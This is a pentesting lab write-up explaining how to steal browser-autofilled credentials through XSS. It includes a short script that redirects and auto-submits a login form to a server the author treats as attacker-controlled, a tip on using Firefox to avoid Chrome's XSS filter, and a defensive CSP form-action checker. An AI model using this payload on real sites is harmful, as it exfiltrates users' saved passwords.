XSS - Stealing from Auto complete: JS for Pentesters task 12 write up

Oct 30, 2014 • jsp, javascript, xss, security-tube

Write-up for task 12 of the JS for Pentesters series by SecurityTube: Stealing Autocomplete

Stealing from AutoComplete? Well, that was my reaction too when I first went through this challenge. People usually save their username:password combinations in the browser so that they don't have to type them again the next time they log in. But if the web application the user logs in to is vulnerable to XSS, this convenience becomes dangerous!

JS for Pentesters task 12

Once you get to the challenge page, enter a random username:password combination and click Sign In. When the browser asks whether to save the password, click Remember Password. From then on, whenever we visit the page, the browser fills the username and password fields in for us automatically. Let us see how this information can be stolen:

So what we basically want to do is submit this form automatically, without user intervention, to an attacker-controlled server. We also need to modify the form's submit action so that it points to our server instead of the original one. The payload looks like this:

    <script>
    // Wait 10 seconds (10000 ms) so the browser has time to autofill the saved credentials
    window.setTimeout(function () {
        // Redirect the form to our server (in this challenge, the lab's endpoint)
        document.forms[0].action = "http://pentesteracademylab.appspot.com/lab/webapp/1";
        // Submit the form programmatically, without any user interaction
        document.forms[0].submit();
    }, 10000);
    </script>

Here we use JavaScript's setTimeout() function, which executes a function after a specified delay; the delay gives the browser time to fill in the saved credentials. Inside that function we point the form's action at our own server and then call .submit(), which submits the form automatically.

We cannot rely on an event handler (which might otherwise seem usable), because .submit() submits the form programmatically rather than through the user clicking the button, so submit event handlers are not triggered.
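From the defender's side, the part of this payload that does the damage is the rewrite of `document.forms[0].action` to a foreign origin. The Content-Security-Policy `form-action` directive restricts the origins a form may be submitted to (it does not fall back to `default-src`), so a policy such as `form-action 'self'` makes the browser refuse the hijacked submission even if the injected script runs. The following Node.js helper is an added example, not code from the original write-up or from PentesterAcademy; it parses a CSP header value and reports whether a submission from a given page origin to a given target URL would be allowed. The origins, URLs and header values are constructed placeholders, and the source matching is a simplified version of the spec's algorithm (`'self'`, `'none'`, `*`, and `[scheme://]host[:port]` with an optional `*.` wildcard).

```javascript
// Added example (not from the original write-up): would a page's CSP block the
// form-action hijack described above? All values below are constructed.

// Parse a CSP header value into a Map of directive name -> list of sources.
function parseCsp(headerValue) {
  const directives = new Map();
  for (const part of headerValue.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (!directives.has(name.toLowerCase())) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Does one CSP source expression match the target URL? Simplified matching:
// 'self', 'none', '*', and [scheme://]host[:port] with an optional "*." prefix.
function sourceMatches(source, pageOrigin, target) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === '*') return true;
  if (src === "'self'") return target.origin === pageOrigin;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false; // unsupported form (e.g. a bare scheme source) treated as no match
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme !== target.protocol.replace(':', '')) return false;
  const hostOk = wildcard ? target.hostname.endsWith('.' + host) : target.hostname === host;
  if (!hostOk) return false;
  if (port && port !== '*') {
    const targetPort = target.port || (target.protocol === 'https:' ? '443' : '80');
    if (port !== targetPort) return false;
  }
  return true;
}

// True when a form on pageOrigin may be submitted to targetUrl under cspHeader.
// A policy without form-action leaves form submission targets unrestricted.
function formSubmissionAllowed(cspHeader, pageOrigin, targetUrl) {
  const sources = parseCsp(cspHeader || '').get('form-action');
  if (!sources) return true;
  const target = new URL(targetUrl);
  return sources.some((s) => sourceMatches(s, pageOrigin.toLowerCase(), target));
}

// Constructed sample data: the login page's origin, its legitimate form action,
// and a placeholder foreign origin that a hijacked form.action might point at.
const PAGE_ORIGIN = 'https://login.example.com';
const ORIGINAL_ACTION = 'https://login.example.com/session';
const HIJACKED_ACTION = 'https://attacker-placeholder.example.net/collect';

const POLICIES = {
  noFormAction: "default-src 'self'; script-src 'self'",       // hijack not blocked
  selfOnly: "default-src 'self'; form-action 'self'",          // hijack blocked
  partner: "form-action 'self' https://*.example.com",         // own subdomains allowed
};

// Summarise, per policy, whether the legitimate and the hijacked submissions pass.
function evaluatePolicies() {
  const report = {};
  for (const [name, policy] of Object.entries(POLICIES)) {
    report[name] = {
      legitimateAllowed: formSubmissionAllowed(policy, PAGE_ORIGIN, ORIGINAL_ACTION),
      hijackAllowed: formSubmissionAllowed(policy, PAGE_ORIGIN, HIJACKED_ACTION),
    };
  }
  return report;
}

console.table(evaluatePolicies());
```

Note that `autocomplete="off"` is not a reliable mitigation here: mainstream browsers ignore it for login fields, so fixing the XSS itself and restricting where the form may be submitted are what actually stop this.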

Note:

1) While working on XSS challenges it is always recommended to use Mozilla Firefox, because Google Chrome has a built-in XSS filter that stops us from executing arbitrary JavaScript even when the page is vulnerable to XSS. So it is strongly recommended to use Firefox instead of Chrome.

2) The solution written above is the way we cracked the problem, which might differ from the solution videos provided by SecurityTube. If you need the solution video, you have to subscribe to PentesterAcademy.

We hope you really liked this challenge. If there is anything you didn't understand or would like more clarity on, please comment below and we are more than happy to help. Also, if you find a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting!

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE